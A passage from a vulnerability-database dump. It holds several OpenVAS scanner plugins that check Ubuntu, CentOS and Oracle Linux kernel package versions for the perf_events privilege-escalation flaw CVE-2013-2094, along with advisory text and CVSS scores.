linux-lts-quantal", "modified": "2018-02-05T00:00:00", "published": "2013-05-17T00:00:00", "id": "OPENVAS:841425", "href": "http://plugins.openvas.org/nasl.php?oid=841425", "type": "openvas", "title": "Ubuntu Update for linux-lts-quantal USN-1828-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1828_1.nasl 8672 2018-02-05 16:39:18Z teissa $\n#\n# Ubuntu Update for linux-lts-quantal USN-1828-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_insight = \"An flaw was discovered in the Linux kernel's perf_events interface. A local\n user could exploit this flaw to escalate privileges on the system.\";\ntag_solution = \"Please Install the Updated Packages.\";\ntag_affected = \"linux-lts-quantal on Ubuntu 12.04 LTS\";\n\n\nif(description)\n{\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_id(841425);\n script_version(\"$Revision: 8672 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-02-05 17:39:18 +0100 (Mon, 05 Feb 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-05-17 09:54:35 +0530 (Fri, 17 May 2013)\");\n script_cve_id(\"CVE-2013-2094\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_name(\"Ubuntu Update for linux-lts-quantal USN-1828-1\");\n\n script_xref(name: \"USN\", value: \"1828-1\");\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1828-1/\");\n script_tag(name: \"summary\" , value: \"Check for the Version of linux-lts-quantal\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-30-generic\", ver:\"3.5.0-30.51~precise1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:36:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2094"], "description": "Oracle Linux Local Security Checks ELSA-2013-2524", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123624", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123624", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2013-2524", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2013-2524.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123624\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:06:25 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2013-2524\");\n script_tag(name:\"insight\", value:\"ELSA-2013-2524 - Unbreakable Enterprise kernel Security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2013-2524\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2013-2524.html\");\n script_cve_id(\"CVE-2013-2094\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux(5|6)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"kernel-uek\", rpm:\"kernel-uek~2.6.39~400.24.1.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug\", rpm:\"kernel-uek-debug~2.6.39~400.24.1.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug-devel\", rpm:\"kernel-uek-debug-devel~2.6.39~400.24.1.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-devel\", rpm:\"kernel-uek-devel~2.6.39~400.24.1.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-doc\", rpm:\"kernel-uek-doc~2.6.39~400.24.1.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-firmware\", rpm:\"kernel-uek-firmware~2.6.39~400.24.1.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"kernel-uek\", rpm:\"kernel-uek~2.6.39~400.24.1.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug\", rpm:\"kernel-uek-debug~2.6.39~400.24.1.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug-devel\", rpm:\"kernel-uek-debug-devel~2.6.39~400.24.1.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-devel\", rpm:\"kernel-uek-devel~2.6.39~400.24.1.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-doc\", rpm:\"kernel-uek-doc~2.6.39~400.24.1.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-firmware\", rpm:\"kernel-uek-firmware~2.6.39~400.24.1.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:49", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2094"], "description": "The remote host is missing an update for the ", "modified": "2019-04-29T00:00:00", "published": "2013-05-17T00:00:00", "id": "OPENVAS:1361412562310881731", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881731", "type": "openvas", "title": "CentOS Update for kernel CESA-2013:0830 centos6", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for kernel CESA-2013:0830 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.881731\");\n script_version(\"2019-04-29T15:08:03+0000\");\n script_tag(name:\"last_modification\", value:\"2019-04-29 15:08:03 +0000 (Mon, 29 Apr 2019)\");\n script_tag(name:\"creation_date\", value:\"2013-05-17 09:53:11 +0530 (Fri, 17 May 2013)\");\n script_cve_id(\"CVE-2013-2094\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Update for kernel CESA-2013:0830 centos6\");\n\n script_xref(name:\"CESA\", value:\"2013:0830\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2013-May/019733.html\");\n script_xref(name:\"URL\", value:\"https://access.redhat.com/knowledge/articles/11258\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n script_tag(name:\"affected\", value:\"kernel on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"The kernel packages contain the Linux kernel, the core of any Linux\n operating system.\n\n This update fixes the following security issue:\n\n * It was found that the Red Hat Enterprise Linux 6.1 kernel update\n (RHSA-2011:0542) introduced an integer conversion issue in the Linux\n kernel's Performance Events implementation. This led to a user-supplied\n index into the perf_swevent_enabled array not being validated properly,\n resulting in out-of-bounds kernel memory access. A local, unprivileged user\n could use this flaw to escalate their privileges. (CVE-2013-2094,\n Important)\n\n A public exploit that affects Red Hat Enterprise Linux 6 is available.\n\n Refer to Red Hat Knowledge Solution 373743, linked to in the References,\n for further information and mitigation instructions for users who are\n unable to immediately apply this update.\n\n Users should upgrade to these updated packages, which contain a backported\n patch to correct this issue. The system must be rebooted for this update to\n take effect.\n\n 4. Solution:\n\n Before applying this update, make sure all previously-released errata\n relevant to your system have been applied.\n\n This update is available via the Red Hat Network. Details on how to\n use the Red Hat Network to apply this update are available at the linked\n references.\n\n To install kernel packages manually, use 'rpm -ivh [package] Do not\n use rpm -Uvh as that will remove the running kernel binaries from\n your system. You may use rpm -e to remove old kernels after\n determining that the new kernel functions properly on your system.\n\n 5. Bugs fixed:\n\n 962792 - CVE-2013-2094 kernel: perf_swevent_enabled array out-of-bound access\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.32~358.6.2.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.32~358.6.2.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.32~358.6.2.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.32~358.6.2.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.32~358.6.2.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.32~358.6.2.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.32~358.6.2.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf\", rpm:\"perf~2.6.32~358.6.2.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~2.6.32~358.6.2.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-12-04T11:21:39", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2094"], "description": "Check for the Version of linux", "modified": "2017-12-01T00:00:00", "published": "2013-05-17T00:00:00", "id": "OPENVAS:841432", "href": "http://plugins.openvas.org/nasl.php?oid=841432", "type": "openvas", "title": "Ubuntu Update for linux USN-1827-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1827_1.nasl 7958 2017-12-01 06:47:47Z santu $\n#\n# Ubuntu Update for linux USN-1827-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"linux on Ubuntu 13.04\";\ntag_insight = \"An flaw was discovered in the Linux kernel's perf_events interface. A local\n user could exploit this flaw to escalate privileges on the system.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(841432);\n script_version(\"$Revision: 7958 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 07:47:47 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-05-17 09:56:18 +0530 (Fri, 17 May 2013)\");\n script_cve_id(\"CVE-2013-2094\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu Update for linux USN-1827-1\");\n\n script_xref(name: \"USN\", value: \"1827-1\");\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1827-1/\");\n script_summary(\"Check for the Version of linux\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU13.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.8.0-21-generic\", ver:\"3.8.0-21.32\", rls:\"UBUNTU13.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:35:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2094"], "description": "Oracle Linux Local Security Checks ELSA-2013-0830", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123623", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123623", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2013-0830", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2013-0830.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123623\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:06:24 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2013-0830\");\n script_tag(name:\"insight\", value:\"ELSA-2013-0830 - kernel security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2013-0830\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2013-0830.html\");\n script_cve_id(\"CVE-2013-2094\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.32~358.6.2.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.32~358.6.2.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.32~358.6.2.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.32~358.6.2.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.32~358.6.2.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.32~358.6.2.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.32~358.6.2.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"perf\", rpm:\"perf~2.6.32~358.6.2.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~2.6.32~358.6.2.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2094"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2013-06-04T00:00:00", "id": "OPENVAS:1361412562310841449", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841449", "type": "openvas", "title": "Ubuntu Update for linux-lts-raring USN-1849-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1849_1.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for linux-lts-raring USN-1849-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.841449\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-06-04 09:20:20 +0530 (Tue, 04 Jun 2013)\");\n script_cve_id(\"CVE-2013-2094\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu Update for linux-lts-raring USN-1849-1\");\n\n script_xref(name:\"USN\", value:\"1849-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1849-1/\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-lts-raring'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.04 LTS\");\n script_tag(name:\"affected\", value:\"linux-lts-raring on Ubuntu 12.04 LTS\");\n script_tag(name:\"insight\", value:\"Kees Cook discovered a flaw in the Linux kernel's iSCSI subsystem. A remote\n unauthenticated attacker could exploit this flaw to cause a denial of\n service (system crash) or potentially gain administrative privileges.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.8.0-23-generic\", ver:\"3.8.0-23.34~precise1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:54", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2094"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2013-05-17T00:00:00", "id": "OPENVAS:1361412562310841432", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841432", "type": "openvas", "title": "Ubuntu Update for linux USN-1827-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1827_1.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for linux USN-1827-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.841432\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-05-17 09:56:18 +0530 (Fri, 17 May 2013)\");\n script_cve_id(\"CVE-2013-2094\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu Update for linux USN-1827-1\");\n\n script_xref(name:\"USN\", value:\"1827-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1827-1/\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU13\\.04\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 13.04\");\n script_tag(name:\"insight\", value:\"An flaw was discovered in the Linux kernel's perf_events interface. A local\n user could exploit this flaw to escalate privileges on the system.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", 